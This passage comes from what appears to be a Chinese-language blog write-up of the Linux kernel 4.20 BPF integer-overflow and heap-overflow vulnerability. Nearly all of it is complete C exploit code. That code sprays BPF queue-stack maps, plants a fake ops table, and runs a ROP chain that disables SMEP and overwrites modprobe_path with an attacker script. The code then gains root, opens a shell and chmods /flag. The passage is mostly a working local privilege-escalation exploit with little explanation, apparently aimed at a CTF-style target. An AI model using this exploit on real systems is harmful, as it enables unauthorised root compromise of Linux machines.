    puts("Prepare ROP");
    Prepare_ROP();

    puts("Alloc pbf");
    res = syscall(__NR_bpf, 0, 0x200011c0, 0x2c);
    if (res != -1)
        r[0] = res;

    puts("Heap Spry");
    HeapSpry();

    *(uint32_t*)0x200000c0 = r[0];  //map_fd,根据BPF_MAP_CREATE返回的编号找到对应的bpf对象
    *(uint64_t*)0x200000c8 = 0;     //key
    *(uint64_t*)0x200000d0 = 0x20000140;    //value,输入的缓冲区
    *(uint64_t*)0x200000d8 = 2;     //flags
    uint64_t* ptr = (uint64_t*)0x20000140;
    ptr[0]=1;
    ptr[1]=2;
    ptr[2]=3;
    ptr[3]=4;
    ptr[4]=5;
    ptr[5]=6;
    ptr[6]=fake_ops;    //从bpf_queue_stack偏移0x30处开始覆盖，因为bpf_queue_stack大小为0xd0，申请堆块为0x100，所以要偏移0x100-0xd0=0x30，bpf_map结构体开头即为bpf_map_ops指针
    ptr[7]=8;
    puts("Update bpf");
    syscall(__NR_bpf, 2, 0x200000c0, 0x20);
    *(unsigned long*)(fake_ops+0x7000) = 0;
    *(unsigned long*)(fake_ops+0x6000) = 0;
    *(unsigned long*)(fake_ops+0x5000) = 0;
    
    puts("Trigger rop");
    for(int i=0;i<SPRAY_NUMBER;i++){
        close(victim[i]);
    }
    //pause();
    return 0;

}

modprobe_path:

//gcc exp.c -static -masm=intel -fno-pie -o exp
//Author: A1ex
//reference: P4nda
#define _GNU_SOURCE
#define SPRAY_NUMBER 14

#include <signal.h>
#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#ifndef __NR_bpf
#define __NR_bpf 321
#endif

size_t user_cs, user_rflags, user_ss, user_sp;
size_t xchg_eax_rsp_r = 0xffffffff81954dc8;
size_t p_rdi_r = 0xffffffff810013b9;
size_t p_rsi_r = 0xffffffff81001c50;
size_t push_rax_push_rsi_r = 0xffffffff81264e0b;
size_t mv_cr4_rax_r = 0xffffffff810037d5;
size_t p_rax_r = 0xffffffff81029c71;
size_t prepare_kernel = 0xffffffff810E3D40;
size_t commit_creds = 0xffffffff810E3AB0;
size_t swaqgs = 0xffffffff81c00d5a;
size_t iretq = 0xffffffff8106d8f4;
size_t mv_rdi_rax_p_r = 0x0;
uint64_t r[1] = {0xffffffffffffffff};
size_t modprobe_path = 0xffffffff8244d040;
size_t memcpy_addr = 0xffffffff81abe3c0;
size_t p_rdx_r = 0xffffffff810a44d7;

void Err(char* buf){
    printf("%s Error\n");
    exit(-1);
}

void getshell(){
    if(!getuid()){
        system("/bin/sh");
    }
    else{
        Err("Not root");
    }
}

void shell()
{
    puts("Get root");
    system("/tmp/ll");
    system("cat /flag");
    char *shell = "/bin/sh";
    char *args[] = {shell, NULL};
    execve(shell, args, NULL);
}

void getroot(){
    char* (*pkc)(int) = prepare_kernel;
    void (*cc)(char*) = commit_creds;
    (*cc)((*pkc)(0));
}

void savestatus(){
       __asm__("mov user_cs,cs;"
           "mov user_ss,ss;"
           "mov user_sp,rsp;"
           "pushf;"            //push eflags
           "pop user_rflags;"
          );
}

unsigned long victim[SPRAY_NUMBER];
void HeapSpry(){
    int i;
    for(i=0;i<SPRAY_NUMBER;i++){
        victim[i] = syscall(__NR_bpf, 0, 0x200011c0, 0x2c);
    }
}

void* fake_ops;
void Prepare_ROP(){
    char* rop_mem = mmap((void*)(xchg_eax_rsp_r&0xfffff000), 0x2000, PROT_READ|PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    unsigned long* rop_addr = (unsigned long*)((xchg_eax_rsp_r & 0xffffffff)+0x674);
    fake_ops = mmap((void *)0xa000000000,0x8000,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);


    unsigned long target = (xchg_eax_rsp_r&0xfffff000)+0x1000;
    strncpy(target, "/tmp/getflag.sh\0\n", 20); 

    *(unsigned long*)(xchg_eax_rsp_r&0xffffffff) = p_rax_r;
    int i = 0;
    rop_addr[i++] = p_rax_r;
    rop_addr[i++] = 0x6f0;
    rop_addr[i++] = mv_cr4_rax_r;
    rop_addr[i++] = p_rdi_r;
    rop_addr[i++] = modprobe_path;
    rop_addr[i++] = p_rsi_r;
    rop_addr[i++] = target;
    rop_addr[i++] = p_rdx_r;
    rop_addr[i++] = 0x20;
    rop_addr[i++] = memcpy_addr;
    // rop_addr[i++] = p_rsi_r;
    // rop_addr[i++] = p_rdi_r;
    // rop_addr[i++] = push_rax_push_rsi_r;
    // rop_addr[i++] = commit_creds;

    // 
    rop_addr[i++] = swaqgs;
    rop_addr[i++] = 0;
    rop_addr[i++] = iretq;
    rop_addr[i++] = (size_t) &shell;
    rop_addr[i++] = user_cs;
    rop_addr[i++] = user_rflags;
    rop_addr[i++] = user_sp;
    rop_addr[i++] = user_ss;

    *(unsigned long*)(fake_ops+0x4000) = 0;
    *(unsigned long*)(fake_ops+0x3000) = 0;
    *(unsigned long*)(fake_ops+0x2000) = 0;
    *(unsigned long*)(fake_ops+0x1000) = 0;
    *(unsigned long*)(fake_ops) = 0;
    *(unsigned long*)(fake_ops+0x10) = xchg_eax_rsp_r;
    *(unsigned long*)(fake_ops+0x7000) = 0;
    *(unsigned long*)(fake_ops+0x6000) = 0;
    *(unsigned long*)(fake_ops+0x5000) = 0;
}

int main(){
    system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag\n' > /tmp/getflag.sh");
    system("chmod +x /tmp/getflag.sh");
    system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/ll");
    system("chmod +x /tmp/ll");
    //signal(SIGSEGV,get_shell_again);
    //get_shell();
    syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
    long res = 0;
    *(uint32_t*)0x200011c0 = 0x17;  //map_type
    *(uint32_t*)0x200011c4 = 0;     //key_size
    *(uint32_t*)0x200011c8 = 0x40;  //value_size 需拷贝的用户字节数
    *(uint32_t*)0x200011cc = -1;    //max_entries=0xffffffff构造整数溢出
    *(uint32_t*)0x200011d0 = 0;     //map_flags
    *(uint32_t*)0x200011d4 = -1;    //inner_map_fd
    *(uint32_t*)0x200011d8 = 0;     //numa_node
    *(uint8_t*)0x200011dc = 0;
    *(uint8_t*)0x200011dd = 0;
    *(uint8_t*)0x200011de = 0;
    *(uint8_t*)0x200011df = 0;
    *(uint8_t*)0x200011e0 = 0;
    *(uint8_t*)0x200011e1 = 0;
    *(uint8_t*)0x200011e2 = 0;
    *(uint8_t*)0x200011e3 = 0;
    *(uint8_t*)0x200011e4 = 0;
    *(uint8_t*)0x200011e5 = 0;
    *(uint8_t*)0x200011e6 = 0;
    *(uint8_t*)0x200011e7 = 0;
    *(uint8_t*)0x200011e8 = 0;
    *(uint8_t*)0x200011e9 = 0;
    *(uint8_t*)0x200011ea = 0;
    *(uint8_t*)0x200011eb = 0;

    savestatus();
    puts("Prepare ROP");
    Prepare_ROP();

    puts("Alloc pbf");
    res = syscall(__NR_bpf, 0, 0x200011c0, 0x2c);
    if (res != -1)
        r[0] = res;

    puts("Heap Spry");
    HeapSpry();

    *(uint32_t*)0x200000c0 = r[0];  //map_fd,根据BPF_MAP_CREATE返回的编号找到对应的bpf对象
    *(uint64_t*)0x200000c8 = 0;     //key
    *(uint64_t*)0x200000d0 = 0x20000140;    //value,输入的缓冲区
    *(uint64_t*)0x200000d8 = 2;     //flags
    uint64_t* ptr = (uint64_t*)0x20000140;
    ptr[0]=1;
    ptr[1]=2;
    ptr[2]=3;
    ptr[3]=4;
    ptr[4]=5;
    ptr[5]=6;
    ptr[6]=fake_ops;    //从bpf_queue_stack偏移0x30处开始覆盖，因为bpf_queue_stack大小为0xd0，申请堆块为0x100，所以要偏移0x100-0xd0=0x30，bpf_map结构体开头即为bpf_map_ops指针
    ptr[7]=8;
    puts("Update bpf");
    syscall(__NR_bpf, 2, 0x200000c0, 0x20);
    *(unsigned long*)(fake_ops+0x7000) = 0;
    *(unsigned long*)(fake_ops+0x6000) = 0;
    *(unsigned long*)(fake_ops+0x5000) = 0;
    
    puts("Trigger rop");
    for(int i=0;i<SPRAY_NUMBER;i++){
        close(victim[i]);
    }
    //pause();
    return 0;

}

参考

Linux kernel 4.20 BPF 整数溢出-堆溢出漏洞及其利用

Linux kernel 4.20 BPF 整数溢出漏洞分析

本文作者： A1ex
本文链接： http://yoursite.com/2021/04/17/Linux-Kernle-4-20-整数溢出和堆溢出漏洞分析/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！